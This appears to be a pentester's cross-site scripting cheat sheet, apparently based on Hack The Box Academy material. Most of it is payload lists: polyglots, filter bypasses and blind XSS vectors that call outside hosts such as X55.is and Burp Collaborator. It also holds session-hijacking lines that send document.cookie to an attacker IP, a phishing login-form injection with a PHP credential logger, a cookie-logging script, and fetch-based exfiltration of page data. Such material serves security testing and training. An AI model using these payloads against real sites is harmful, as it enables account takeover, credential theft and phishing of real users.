Types of attack
Other browser based exploits - There are millions of possibilities with XSS.
Types of XSS
The most critical type of XSS, which occurs when user input is stored on the back-end database and then displayed upon retrieval (e.g., posts or comments)
Reflected (Non-Persistent) XSS
Occurs when user input is displayed on the page after being processed by the backend server, but without being stored (e.g., search result or error message)
Another Non-Persistent XSS type that occurs when user input is directly shown in the browser and is completely processed on the client-side, without reaching the back-end server (e.g., through client-side HTTP parameters or anchor tags)
Extension to incorporate XSS Cheatsheet in Burp
Fuzzing Reflected Parameters
Chrome extension
Basic Payloads
Polyglot payload - All in one
Copy 1'"<S><A HRef=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Title=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Alt=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Name=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Class=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; >
Copy 1'"<S><Img Src=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Title=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Alt=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Name=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Class=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; >
Copy 1'"<S><Input Value=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Name=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Class=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; PlaceHolder=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; >
Source: https://brutelogic.com.br/blog/bypassing-whitelists-with-xss-payloads-in-attributes/
Grep - Match 1337: https://portswigger.net/burp/documentation/desktop/tools/intruder/uses/fuzzing
Try to start the payloads with a single quote '
or a double quote "
Also try with, >
, '>
and ">
Check the source code to close the appropriate tag if necessary
Copy JavaScript: //%250Aalert?.(1337)// '/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--> </Title/</Style/</Script/</textArea/</iFrame/</noScript> \74k<K/contentEditable/autoFocus/OnFocus= /*${/*/;{/**/(alert)(1337)}//><Base/Href=//hello\76-->
</ Scri % 7Kt >< Scri % 7Kt >% 7Krompt % 6 K1337 % 6 K </ Scri % 7Kt >
< script >alert(1337);</ script >
< sc < script >ript>alert(1337);</ script >
< sCriPt >alert(1337);</ sCriPt >
< button onmouseover = "alert(1337);" >xss</ button >
< button onclick = "alert(1337);" >xss</ button >
< img src = "/static/level3/cloud3.jpg" onclick = "alert(1337)" >
< img src = "x" onerror = "alert(1337)" >
< img src = "x" onerror = "alert(1337);"
<img src = "#" onerror = "alert(1337)" >
< img src = "#" onerror = "alert(1337)" >
< img src = "#" onerror = "eval('alert(1337)')" >
< img src onerror %09=top['ale'%2b'rt'](1337)>
<iframe src = "javascript:alert(`1337`)" >
< script >alert(1337)</ script >
< Script >alert(1337)</ Script >
< sCript >alert(1337)</ sCript >
< script >alert(1337);</ script >
< script >alert("1337");</ script >
< script >alert(1337)</ script >
</ script >< script >alert(1337)</ script >
1')"< S --><A HRef AutoFocus OnFocus =(confirm)(1337)//
test"/><output name = "result" onclick = "alert(1337)" >chux</ output >
<!--%26gt;< TextArea ><!-->< Script >/*/</ TextArea >/*/alert(1337)</ Script >
test"< s >< a href = //%26lt;svg/o%26%2378;load=alert(1337)%26gt;>
<input accesskey =X onclick = "self['wind'+'ow']['one'+'rror']=alert;throw 1337;" >
< Svg OnLoad =location=textContent>JavaS<a>cript:al<a>ert(<a>1337)//
<Svg OnLoad =location=`Java${/S/.source}cript:alert${"\50"}1337)`>
<img src = "X" onerror =top[8680439..toString(30)](1337)>
' `"><\x00script>javascript:alert(1337)</script>
<img src =1 href =1 onerror = "javascript:alert(1337)" ></ img >
< audio src =1 href =1 onerror = "javascript:alert(1337)" ></ audio >
< video src =1 href =1 onerror = "javascript:alert(1337)" ></ video >
< body src =1 href =1 onerror = "javascript:alert(1337)" ></ body >
< image src =1 href =1 onerror = "javascript:alert(1337)" ></ image >
< object src =1 href =1 onerror = "javascript:alert(1337)" ></ object >
< script src =1 href =1 onerror = "javascript:alert(1337)" ></ script >
< svg onResize svg onResize = "javascript:javascript:alert(1337)" ></svg onResize>
< title onPropertyChange title onPropertyChange = "javascript:javascript:alert(1337)" ></title onPropertyChange>
< iframe onLoad iframe onLoad = "javascript:javascript:alert(1337)" ></iframe onLoad>
< audio controls onwaiting =alert(1337)><source src =x type =x></audio>
'<00 foo="<a%20href="javascript:alert(1337)">XSS-CLick</00>--%20/
<section onscrollsnapchange=alert(1) style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></section>
</<K><Svg Onload=alert(1337)>
</<Kno XSS="><Svg Onload=alert(1337)>
<!<K><Svg Onload=alert(1337)>
<!<Kno XSS="><Svg Onload=alert(1337)>
<a href="javascript:alert(1337)">show</a>
<a href="data:text/html;base64,<alert(1337) encoded>"show</a>
<form action="javascript:alert(1337)"><button>send</button></form>
<form id=x></form><button form="x" formaction="javascript:alert(1337)">send</button>
<object data="javascript:alert(1337)">
<object data="data:text/html;base64, <alert(1337) encoded>">
<body onload=alert(1337)>
<input type=image src=x:x onerror=alert(1337)>
<isindex onmouseover="alert(1337)" >
<form oninput=alert(1337)><input></form>
<texarea autofocus onfocus=alert(1337)>
<input oncut=alert(1337)>
<svg onload=alert(1337)>
<keygen autofocus onfocus=alert(1337)">
<video><source onerror="alert(1337)">
<marquee onstart=alert(1337)>
<svg id=x; onload=alert(1337)>
<svg onload%09=alert(1337)>
<svg %09onload=alert(1337)>
<svg %09onload%20=alert(1337)>
<svg onload%09%20%28%2C%3B=alert(1337)>
<svg onload%0B=alert(1337)>
<svg id=' x' onload =alert(1337)>
<img src =x onerror = "\u0061lert(1337)" />
< img src =x onerror = "eval('\141lert(1337)')" />
< img src =x onerror = "eval('\x61lert(1337)')" />
< img src =x onerror = "eval('alert(1337)')" />
< img src =x onerror = "eval('alert(1337)')" />
< img src =x onerror = "eval('\a\l\ert(1\)')" />
< img src =x onerror = "eval('\a\l\ert(1\3\3\7\)')" />
< object data = "JaVScRiPt:alert(1337)" >
< object data = "javascript::alert(1337)" >
< object data = "javascript:alert(1337)" >
< object data = "javascript:alert(1337)" >
< object data = "javascript:alert(1337)" >
< object data = "data:text/html,<script>alert(1337)</script>" >
< embed code = "DaTa:text/html,<script>alert(1337)</script>" >
< embed code = "data:text/html,<script>alert(1337)</script>" >
< embed code = "data:text/html,<script>alert(1337)</script>" >
< embed code = "data:text/html,<script>alert(1337)</script>" >
< scr < iframe >ipt>alert(1337)</ script >
< scr < script >ipt>alert(1337)</ script >
< iframe >< style id = "</iframe><img src=1 onerror=alert(1337)>" >
< noframes >< style id = "</noframes><img src=1 onerror=alert(1337)>" >
< noscript >< p id = "</noscript><img src=1 onerror=alert(1337)>" >
< style >< p id = "</style><img src=1 onerror=alert(1337)>" >
< style >< p id = "</style><img src=" 1" onerror = "alert(1337)" >">">
< svg >< style >< img src = "1" onerror = "alert(1337)" >
< math >< style >< img src = "1" onerror = "alert(1337)" >
< math >< style ></ style ></ math >< img src = "1" onerror = "alert(1337)" >
< select >< style >< input >< img src =1 onerror =alert(1337)></select>
<select></select><input><img src = "1" onerror = "alert(1337)" >
< body >< title >< p id = "</title><img src onerror=alert(1337)>" ></ title >
< body >< noscript >< p id = "</noscript><img src onerror=alert(1337)>" >
< maths >< style ><!--</ style >< img src onerror =alert(1337)>--></style></maths>
<svg><style>/*<img src onerror =alert(1337)>*/</style></svg>
<math><style>/*<img src onerror =alert(1337)>*/
<noscript><style>/*</noscript><img src onerror =alert(1337)>*/
<math><annotation-xml><style><img src onerror =alert(1337)></style></annotation-xml></math>
<body><textarea><a is = "</textarea><img src onerror=alert(1337)>" >
< math >< annotation-xml encoding = "text/html" >< x >< svg >< mtext >< textarea >< a is = "</textarea><img src onerror=alert(1337)>" >
< form >< math >< mtext ></ form >< form >< mglyph >< svg >< mtext >< title >< path is = "</title><img src onerror=alert(1337)>" >
< Img Src =OnXSS OnError =alert(1337)>
""" ontoggle =alert(1337)
"' "'" ontoggle =alert1337
"><img src=x onerrora=confirm() onerror=confirm(1337)>
<img//////src=x oNlY=1 oNerror=alert(1337)//
<img%20hrEF=" x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt1337>
<Img Src =OnXSS OnError = { prompt `1337` }>
">< img src =x onerrora =confirm() onerror =confirm(1337)>
"><div/onclick=" (function(){setTimeout(()%20=>%20alert(1337),%200);})();">Click%20me!</div>
<Img Src =OnXSS OnError =confirm(1337)>
"><input%0a%0atype=" hidden"%0a%0aoncontentvisibilityautostatechange=confirm(/1337/)%0d%0astyle=content-visibility:auto>
"><input type=" hidden" oncontentvisibilityautostatechange = "confirm(/1337/)" style = "content-visibility:auto" >
< p oncontentvisibilityautostatechange = "alert(/1337/)" style = "content-visibility:auto" >
test" oncontentvisibilityautostatechange="confirm(/1337/)" style="content-visibility:auto
test" oncontentvisibilityautostatechange="alert(/1337/)" style="content-visibility:auto
Payload List
Copy </ Scri % 7Kt >< Scri % 7Kt >% 7Krompt % 6 K1 % 6 K </ Scri % 7Kt >
JavaScript : //%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--</Title/</Style/</Script/</textArea/</iFrame>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\http://X55.is/.source))}//\76-->
< script >alert('xss');</ script >
< sc < script >ript>alert('xss');</ script >
< sCriPt >alert('xss');</ sCriPt >
< button onmouseover = "alert('xss');" >xss</ button >
< button onclick = "alert('xss');" >xss</ button >
< img src = "/static/level3/cloud3.jpg" onclick = "alert('xss')" >
< img src = "x" onerror = "alert('xss')" >
< img src = "x" onerror = "alert(document.cookie);"
<iframe src = "javascript:alert(`xss`)" >
< script >alert(1)</ script >
< Script >alert(1)</ Script >
< sCript >alert(document.domain)</ sCript >
< script >alert(123);</ script >
< script >alert("test");</ script >
< script >alert(document.cookie)</ script >
</ script >< script >alert(document.cookie)</ script >
1')"< S --><A HRef AutoFocus OnFocus =(confirm)(1)//
<img src =x onerror = "fetch('[HOST]' + document.cookie)" />
< script >fetch('[host]')</ script >
test"/>< output name = "result" onclick = "alert('something')" >chux</ output >
<!--%26gt;< TextArea ><!-->< Script >/*/</ TextArea >/*/alert(1)</ Script >
test"< s >< a href = //%26lt;svg/o%26%2378;load=alert(1)%26gt;>
<<https:http://x55.is/onfocus=1?import(tagName):1 AutoFocus ContentEditable >>
< input accesskey =X onclick = "self['wind'+'ow']['one'+'rror']=alert;throw 1337;" >
< Svg OnLoad =location=textContent>JavaS<a>cript:al<a>ert(<a>1)//
<Svg OnLoad =location=`Java${/S/.source}cript:alert${"\50"}1)`>
<img src = "X" onerror =top[8680439..toString(30)](1337)>
Stored XSS
Copy < script > alert ( window .origin)</ script >
Tip: Many modern web applications utilize cross-domain IFrames to handle user input, so that even if the web form is vulnerable to XSS, it would not be a vulnerability on the main web application. This is why we are showing the value of window.origin
in the alert box, instead of a static value like 1
. In this case, the alert box would reveal the URL it is being executed on, and will confirm which form is the vulnerable one, in case an IFrame was being used.
Copy <script>print()</script>
Will pop up the browser print dialog, which is unlikely to be blocked by any browser
Copy <script>alert(document.cookie)</script>
Reflected XSS
Copy < div ></ div >< ul class = "list-unstyled" id = "todo" >< div style = "padding-left:25px" >Task '< script > alert ( window .origin)</ script >' could not be added.</ div ></ ul >
The single quotes contain our XSS payload '<script>alert(window.origin)</script>'
request sends their parameters and data as part of the URL. So, to target a user, we can send them a URL containing our payload
Copy http://URL/index.php?task=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
Copy var pos = document . URL .indexOf ( "task=" );
var task = document . URL .substring (pos + 5 , document . URL . length );
Copy document .getElementById ( "todo" ).innerHTML = "<b>Next Task:</b> " + decodeURIComponent (task);
function does not allow the use of the <script>
tags within it as a security feature
Copy < img src = "" onerror = alert ( window .origin) >
Firefox Extension
Blind XSS
Create a demo account: https://knoxss.me/
Blind XSS Custom Vector - Default
Copy <Script /Src=https://X55.is?1=[YOUR_ID]></Script>
Blind XSS Custom Vector - Short Polyglot (HTML & JS Main Cases)
Copy '/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:\\X55.is?1=[YOUR_ID]/.source))//>
Blind XSS Custom Vector - Full Polyglot (20+ XSS Cases)
Copy JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\X55.is?1=[YOUR_ID]/.source))}//\76-->
XSS Discovery
Burp, Nessus, ZAP
Nuclei Template
Copy id : reflection
info :
name : search for reflection in header and body
author : roninja
severity : low
description : Potential Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF) attacks, Cache Poisoning and Open URL Redirection.
reference :
- https://{{Hostname}}.{{interactsh-url}}
tags : reflection,header,cookies
metadata :
max-request : 2
requests :
- raw :
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Mobile Safari/537.36
Referer: https://r.{{Host}}.{{interactsh-url}}
Origin: https://o.{{Host}}.{{interactsh-url}}
Location: https://l.{{Host}}.{{interactsh-url}}
X-Forwarded-Host: xfh.{{Host}}.{{interactsh-url}}
X-Forwarded-For: xff.{{Host}}.{{interactsh-url}}
X-Host: xh.{{Host}}.{{interactsh-url}}
X-Original-Host: xoh.{{Host}}.{{interactsh-url}}
X-Original-URL: xou.{{Host}}.{{interactsh-url}}
Cookie: gude=tama.{{interactsh-url}}
Gudetama: {{interactsh-url}}
Accept-Encoding: gzip, deflate, br, zstd
- |
GET / HTTP/1.1
Host: {{Host}}.{{interactsh-url}}
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Mobile Safari/537.36
Cookie: gude=tama.{{interactsh-url}}
Set-Cookie: gude=tama.{{interactsh-url}}
Accept-Encoding: gzip, deflate, br, zstd
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/ Mobile Safari/537.36
Cookie: gude=tama.{{interactsh-url}}
Set-Cookie: gude=tama.{{interactsh-url}}
Accept-Encoding: gzip, deflate, br, zstd
redirects : false
stop-at-first-match : false
matchers-condition : or
matchers :
- type : regex
regex :
- '(?m)^(?:(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(gude=tama)(?:\s*?)(?:$|;))'
- '(?mi)^(.*:\s*.*oast.*)'
part : header
- type : regex
regex :
- '(?m)^(?:(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(gude=tama)(?:\s*?)(?:$|;))'
- '(?mi)^(.*:\s*.*oast.*)'
part : body
Open Source
Copy python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"
Other great tool:
Release Page - build in - Just download
Commercial Tool - Knoxss
See Payload
Note: XSS can be injected into any input in the HTML page, which is not exclusive to HTML input fields, but may also be in HTTP headers like the Cookie or User-Agent (i.e., when their values are displayed on the page).
Three HTML elements are usually utilized to change the main look of a web page:
Background Color document.body.style.background
Background document.body.background
Page Title document.title
Changing Background
Copy < script > document . body . style .background = "#141d2b" </ script >
Here we set the background color to the default Hack The Box background color. We can use any other hex value, or can use a named color like = "black"
Copy # Change background color to red
<img src="test" onmouseover="document.body.style.backgroundColor = 'red'">
Copy < script > document . body .background = "https://www.hackthebox.eu/images/logo-htb.svg" </ script >
Changing Page Title
Copy < script > document .title = 'HackTheBox Academy' </ script >
Copy # Title defacement
<script>document.getElementById('thm-title').innerHTML="I am a hacker";</script>
Changing Page Text
Copy document .getElementById ( "todo" ).innerHTML = "New Text"
Copy $ ( "#todo" ) .html ( 'New Text' );
Copy document .getElementsByTagName ( 'body' )[ 0 ].innerHTML = "New Text"
=> by specifying [0]
, we are selecting the first body
element, which should change the entire text of the web page
Copy < script > document .getElementsByTagName ( 'body' )[ 0 ].innerHTML = '<center><h1 style="color: white">Cyber Security Training</h1><p style="color: white">by <img src="https://academy.hackthebox.com/images/logo-htb.svg" height="25px" alt="HTB Academy"> </p></center>' </ script >
Tip: To understand which payload should work, try to view how your input is displayed in the HTML source after you add it.
Login Form Injection
Login form:
Copy < h3 >Please login to continue</ h3 >
< form action = http://OUR_IP >
< input type = "username" name = "username" placeholder = "Username" >
< input type = "password" name = "password" placeholder = "Password" >
< input type = "submit" name = "submit" value = "Login" >
</ form >
Copy document .write ( '<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>' );
Vicitm URL: http://SERVER_IP/phishing/index.php?url=...SNIP...
Remove the URL field, such that they may think that they have to log in to be able to use the page. To do so, we can use the JavaScript function document.getElementById().remove()
Find the id
of the HTML element we want to remove:
Copy document .getElementById ( 'urlform' ) .remove ();
Final Payload:
Copy document .write ( '<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>' ); document .getElementById ( 'urlform' ) .remove ();
Remove the original HTML code left after our injected login form
Credential Stealing
If any victim attempts to log in with the form, we will get their credentials.
Copy connect to [10.10.XX.XX] from (UNKNOWN) [10.10.XX.XX] XXXXX
GET /?username=test&password=test&submit=Login HTTP/1.1
Host: 10.10.XX.XX
Use a basic PHP script that logs the credentials from the HTTP request and then returns the victim to the original page without any injections
Copy <? php
if ( isset ( $_GET[ 'username' ] ) && isset ( $_GET[ 'password' ] ) ) {
$file = fopen ( "creds.txt" , "a+" ) ;
fputs ( $file , "Username: {$_GET['username']} | Password: {$_GET['password']}\n" ) ;
header ( "Location: http://SERVER_IP/phishing/index.php" ) ;
fclose ( $file ) ;
exit ();
Start a PHP
listening server,
Copy $ mkdir /tmp/tmpserver
$ cd /tmp/tmpserver
$ vi index.php #at this step we wrote our index.php file
$ sudo php -S
PHP 7.4.15 Development Server ( started
Session Hijacking
Copy # Cookie stealing example
<img src=x onerror="this.src=''+document.cookie; this.removeAttribute('onerror');">
Blind XSS Detection
Payload Generator:
Copy < script src = "http://OUR_IP/script.js" ></ script >
Identify the vulnerable input field that executed the script
Copy < script src = "http://OUR_IP/username" ></ script >
If we get a request for /username
, then we know that the username
field is vulnerable to XSS, and so on.
Copy < img src = "https://example.burpcollaborator.net/image" >
< img src = "https://example.burpcollaborator.net/image-only" onerror = 'this.src="https://example.burpcollaborator.net/image-xss?"+btoa(document.location)' >
< img src =x onerror = 'this.src="https://example.burpcollaborator.net/image-xss?"+btoa(document.location)' >
< img src =x onerror = 'this.src="https://"+btoa(document.location)+".example.burpcollaborator.net/image-dns?"' >
< img src =x onerror = 'this.src="https://example.burpcollaborator.net/image-xss?"+btoa(document.location)' >
< img src =x onerror = 'fetch("https://example.burpcollaborator.net/image-xss-post",{method:"POST",body:btoa(document.body.innerHTML),mode:"no-cors"})' >
< iframe src = 'javascript:window.location="https://example.burpcollaborator.net/iframe-src?"+btoa(parent.document.location)' ></ iframe >
< iframe srcdoc = '<script>window.location="https://example.burpcollaborator.net/iframe-srcdoc?"+btoa(parent.document.location)</script>' ></ iframe >
< iframe srcdoc = '<script>fetch("https://example.burpcollaborator.net/iframe-srcdoc-post",{method:"POST",body:btoa(parent.document.body.innerHTML),mode:"no-cors"})</script>' ></ iframe >
< object data = 'javascript:window.location="https://example.burpcollaborator.net/iframe-src?"+btoa(parent.document.location)' ></ object >
< input onfocus = 'fetch("https://example.burpcollaborator.net/imput-post",{method:"POST",body:btoa(document.body.innerHTML),mode:"no-cors"})' autofocus >
< script src =https://example.burpcollaborator.net/script-tag></script>
<script type = "text/javascript" src = "https://example.burpcollaborator.net/script-tag-type" ></ script >
< script type = "module" src = "https://example.burpcollaborator.net/script-tag-module" ></ script >
< script nomodule src = "https://example.burpcollaborator.net/script-tag-nomodule" ></ script >
'">< img src = "https://example.burpcollaborator.net/image" >
'">< img src = "https://example.burpcollaborator.net/image-only" onerror = 'this.src="https://example.burpcollaborator.net/image-xss?"+btoa(document.location)' >
'">< img src =x onerror = 'this.src="https://example.burpcollaborator.net/image-xss?"+btoa(document.location)' >
'">< img src =x onerror = 'this.src="https://"+btoa(document.location)+".example.burpcollaborator.net/image-dns?"' >
'">< img src =x onerror = 'this.src="https://example.burpcollaborator.net/image-xss?"+btoa(document.location)' >
'">< img src =x onerror = 'fetch("https://example.burpcollaborator.net/image-xss-post",{method:"POST",body:btoa(document.body.innerHTML),mode:"no-cors"})' >
'">< iframe src = 'javascript:window.location="https://example.burpcollaborator.net/iframe-src?"+btoa(parent.document.location)' ></ iframe >
'">< iframe srcdoc = '<script>window.location="https://example.burpcollaborator.net/iframe-srcdoc?"+btoa(parent.document.location)</script>' ></ iframe >
'">< iframe srcdoc = '<script>fetch("https://example.burpcollaborator.net/iframe-srcdoc-post",{method:"POST",body:btoa(parent.document.body.innerHTML),mode:"no-cors"})</script>' ></ iframe >
'">< object data = 'javascript:window.location="https://example.burpcollaborator.net/iframe-src?"+btoa(parent.document.location)' ></ object >
< input onfocus = 'fetch("https://example.burpcollaborator.net/imput-post",{method:"POST",body:btoa(document.body.innerHTML),mode:"no-cors"})' autofocus >
'">< script src =https://example.burpcollaborator.net/script-tag></script>
'"><script type="text/javascript" src="https://example.burpcollaborator.net/script-tag-type"></script>
'"><script type=" module" src = "https://example.burpcollaborator.net/script-tag-module" ></ script >
'">< script nomodule src = "https://example.burpcollaborator.net/script-tag-nomodule" ></ script >
Copy ';"</scrpt><scrpt/src=//xss.report/c/target-1></scrpt>
1 "`/import(src)'<Script/Src=//X55.is?1=[ID]><Img/OnLoad='`
Payloads from PayloadsAllTheThings
Copy "><script src=//OUR_IP/field_name></script>
Copy < script src = http://OUR_IP ></ script >
'>< script src = http://OUR_IP ></ script >
">< script src = http://OUR_IP ></ script >
javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')
< script > function b (){ eval ( this .responseText)};a =new XMLHttpRequest (); a .addEventListener ( "load" , b); a .open ( "GET" , "//OUR_IP" ); a .send ();</ script >
< script > $ .getScript ( "http://OUR_IP" )</ script >
Copy 0xss0rz@htb[/htb]$ mkdir /tmp/tmpserver
0xss0rz@htb[/htb]$ cd /tmp/tmpserver
0xss0rz@htb[/htb]$ sudo php -S
PHP 7.4.15 Development Server ( started
Now we can start testing these payloads one by one by using one of them for all of input fields and appending the name of the field after our IP
Copy < script src = http://OUR_IP/fullname ></ script > #this goes inside the full-name field
< script src = http://OUR_IP/username ></ script > #this goes inside the username field
Tip: We will notice that the email must match an email format, even if we try manipulating the HTTP request parameters, as it seems to be validated on both the front-end and the back-end. Hence, the email field is not vulnerable, and we can skip testing it. Likewise, we may skip the password field, as passwords are usually hashed and not usually shown in cleartext. This helps us in reducing the number of potentially vulnerable input fields we need to test.
Also see Blind XSS
Session Hijacking
Copy document .location = 'http://OUR_IP/index.php?c=' + document .cookie;
new Image ().src = 'http://OUR_IP/index.php?c=' + document .cookie;
Copy <script>document.location='http://OUR_IP/index.php?c='+document.cookie;</script>
<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>
Write any of these JavaScript payloads to script.js
, which will be hosted on our VM
Copy new Image ().src = 'http://OUR_IP/index.php?c=' + document .cookie
Change the URL in the XSS payload we found earlier to use script.js
Copy < script src = http://OUR_IP/script.js ></ script >
If there were many cookies, we may not know which cookie value belongs to which cookie header. So, we can write a PHP script to split them with a new line and write them to a file
Save the following PHP script as index.php
Copy <? php
if ( isset ( $_GET[ 'c' ] ) ) {
$list = explode ( ";" , $_GET[ 'c' ] ) ;
foreach ($list as $key => $value) {
$cookie = urldecode ( $value ) ;
$file = fopen ( "cookies.txt" , "a+" ) ;
fputs ( $file , "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n" ) ;
fclose ( $file ) ;
Copy < img src =x onerror = "fetch('/api/info').then(r=>r.text()).then(t=>fetch(''+encodeURIComponent(t),{mode:'no-cors'}))" >
Copy < script >
.then(response => response.text())
.then(data => {
fetch ( "" + encodeURIComponent (data));
.catch(error => console.error("Error fetching the messages:", error));
</ script >
If it doesn't work, try to put a js file on your webserver and fetch it:
Copy fetch ( '/api/info' )
.then (response => response .text ()) // Get the response body as text
.then (text => {
// Send the base64-encoded response to your server
fetch ( '' + btoa (text) , { mode : 'no-cors' });
Copy < img src =1 onerror = "var s=document.createElement('script'); s.src=''; document.body.appendChild(s);" >
XSS in an email / username
Copy "><Svg/OnLoad=alert(1)>"@gmail.com
XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required).
XSS in phone number
Copy +441134960000;phone-context=<script>alert(1)</script>
XSS in .css file
Copy "/lib/css/animated.min'"/><script%20>alert(document.domain)<%2fscript>.css"
Copy # https://github.com/evilcos/xss.swf
<object data="//hacker.site/xss.swf">
<embed code="//hacker.site/xss.swf" allowscriptaccess=always>
SVG Tag - Confuse filters
Copy %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
Copy <svg>
Source: https://x.com/garethheyes/status/1843331462004912389?t=wmNCIF85tvyXZ21GMJ9B6w&s=03
Copy <svg> <script> 1<![CDATA[</script>]]>/-alert(1) </script> </svg>
<svg> <script> /* <![CDATA[*]]><![CDATA[/]]>alert(1)-/\*/ </script>
Copy <svg><use><set attributeName="href" to="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000'><image href='1' onerror='alert(1)' /></svg>#x" />
Source: https://x.com/0x0SojalSec/status/1844806824983413002?t=sfLD3yJAVRjsXew1YJ40QA&s=03
Copy <svg>
Copy <svg><script>
Copy <svg>
XSS Polyglots
Copy jaVasCript : /*-/*`/*\`/*'/*"/**/ ( /* */ oNcliCk = alert () ) //%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
</ script >< svg / onload = '+/"/+/onmouseover=1/+(s=document.createElement(/script/.source), s.stack=Error().stack, s.src=(/,/+/oastify.com/).slice(2), document.documentElement.appendChild(s))//' >
< /Title/ < /Style/ < /Script/ < /textArea/ < /iFrame/ </ noScript >< K / contentEditable / autoFocus / OnFocus = (alert)( 1337 ) >
/*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=/**/ {(alert)( 1337 )} //>
<! – > /*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript><K/contentEditable/autoFocus/OnFocus=/**/ {(alert)( 1337 )} //–>
<! – > /*’/*\’/*”/*\”/*`/*\`/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/**/ {(alert)( 1337 )} //><Base/Href=//X55.is\76–>
<! – > /*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/**/ ;{(alert)( 1337 )} //><Base/Href=//X55.is\76–>
<! – > /*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/ ;{ /**/ (alert)( 1337 )} //><Base/Href=//X55.is\76–>
<! – > /*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*%0D%0AContent-Type:text/html%0D%0A%0D%0A</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/ ;{ /**/ (alert)( 1337 )} //><Base/Href=//X55.is\76–>
JavaScript : //%250Aalert?.(1)//*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*<!–></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>
JavaScript : //%250Aalert?.(1)//*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*<!–></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>\
XSS Cuneiform-alphabet based
